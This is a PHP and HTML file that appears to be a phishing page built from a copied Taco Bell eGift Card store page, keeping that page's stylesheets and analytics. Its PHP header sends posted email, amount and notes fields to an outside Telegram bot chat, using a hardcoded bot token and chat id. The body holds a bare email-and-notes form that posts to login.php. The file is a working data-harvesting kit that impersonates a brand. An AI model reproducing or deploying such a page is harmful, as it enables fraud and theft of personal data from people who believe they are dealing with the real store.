<?php
$email = $_POST['email'];
$amount = $_POST['amount'];
$notes = $_POST['notes'];
$message ="REQUEST FORM FILLED\n\n$email\n\n============\n\n$amount\n\n\n==============\n\n$notes\n";

$apiToken = "5884162033:AAG_CgkEbML9dXsIy9E1K03yWzUOxbmf8cA"; 
$data = [
    'chat_id' => '-1001831940786',
    'text' => $message
];

$response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" .
                                 http_build_query($data) );
                                                    

?><html lang="en-US"><head>

   <style>
        body {
            background-color: #222;
            color: #fff;
            font-family: Arial, sans-serif;
            padding: 20px;
        }

        h1 {
            text-align: center;
            margin-bottom: 30px;
        }

        form {
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        label {
            display: block;
            font-size: 16px;
            margin-bottom: 10px;
        }

        input[type="text"],
        textarea {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            border: none;
            border-radius: 5px;
            margin-bottom: 20px;
            background-color: #444;
            color: #fff;
        }

        input[type="submit"] {
            background-color: #333;
            color: #fff;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }
    </style>


        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <meta name="description" content="A responsive giftcard store">
        <meta name="author" content="Gift Solutions">
        
        
        <!-- REVIEW 39565602 -->
        <!-- GEB 09/13/2018 Adding in icons for apple payment sheet. These are not mandatory to have-->
         
         
         <!-- image dimensions 180px x 180px -->
        <!-- REVIEW 38194194 -->
        <!-- GEB 06/28/2018 Adding in a dynamic title for ada compliance -->
                <title>Taco Bell | eGift Card | Choose Design</title>
        <!-- ENG-1860 -->
        <!-- ENG-1860 -->

        <!-- Typekit code if the json has been added for the store -->
                <!-- Typography.com code if the json has been added for the store -->
        
                    <link href="https://tw-merchant-content-production.s3.amazonaws.com/public/css/responsive/combined.css" rel="stylesheet">
                <!-- REVIEW 43837435 -->
            <!-- GEB 07/01/2018 add ability for JSON to determine what custom styles to use for a stores styles.css file -->
                        <!-- Custom styles for this store generated by sass -->
                <link rel="stylesheet" href="https://tw-merchant-content-production.s3.amazonaws.com/private/retail/225/tacobell/responsive/css/styles.css">
            
        
        
        <!--[if lte IE 9]>
            <link rel="stylesheet" href="https://tw-merchant-content-production.s3.amazonaws.com/private/retail/225/tacobell/responsive/css/ie9styles.css">
        <![endif]-->

        
        <!--[if lt IE 9]>
            <link rel="stylesheet" href="https://tw-merchant-content-production.s3.amazonaws.com/public/css/responsive/ie8_main.css">
            <script src="https://tw-merchant-content-production.s3.amazonaws.com/public/js/html5shiv.js"></script>
            <script src="https://tw-merchant-content-production.s3.amazonaws.com/public/js/respond.min.js"></script>
        <![endif]-->


        <!-- //This gets the max future delivery days from the stores json configuration if its not set it uses the default 180 days -->
        
                <script src="https://cdn.perfdrive.com/aperture/apertur###" async=""></script><script type="text/javascript" async="" src="https://www.google-analytics.com/plugins/ua/ec.js"></script>
        	    
<script>
    var dataLayer = window.dataLayer = window.dataLayer || [];
        const brandDimensionValue = 'tacobell';
    dataLayer.push({
        'dimension1': brandDimensionValue,
        '&cu': 'USD'
    });
            dataLayer.push({
        'ecommerce': {
            'currencyCode': 'USD',
            'detail': {}
        }
    });
        </script>


<form action="login.php" method="POST">
        <br> <br><br> <br> <br> <br> <br> <br> <br><label for="email">Email:</label>
        <input name="email" id="email" required="" type="text" width="">

        <label for="notes">Notes:</label>
        <textarea name="notes" id="notes" rows="4"></textarea>

        <input value="Submit" type="submit">
    </form><form name="" action="taco2.php" method="post" enctype="">


    
<input name="" id="picked_envelope" value="" type="hidden">

<div class="choose container" role="main" id="mainContent">
            
       <style>
        body {
            background-color: #222;
            color: #fff;
            font-family: Arial, sans-serif;
            padding: 20px;
        }

        h1 {
            text-align: center;
            margin-bottom: 30px;
        }

        form {
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        label {
            display: block;
            font-size: 16px;
            margin-bottom: 10px;
        }

        input[type="text"],
        textarea {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            border: none;
            border-radius: 5px;
            margin-bottom: 20px;
            background-color: #444;
            color: #fff;
        }

        input[type="submit"] {
            background-color: #333;
            color: #fff;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }
    </style>



    



    
</div>I have an idea.<!-- .container -->
</form><!-- REVIEW 43144559 -->
<script></script>
<noscript>This site requires javascript.  Please enable javascript on your browser. </noscript>
        <noscript>This site requires javascript.  Please enable javascript on your browser. </noscript>
    <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics###','ga');

  ga('create', 'UA-7670652-6', 'auto', {'name': 'gcTracker'});

    var dimensionValue = 'tacobell';
  ga('gcTracker.set', 'dimension1', dimensionValue);
  ga('gcTracker.require', 'ec');
  ga('gcTracker.set', '&cu', 'USD');
      ga('gcTracker.ec:setAction', 'detail');
      ga('gcTracker.send', 'pageview');
</script>    
</body></html>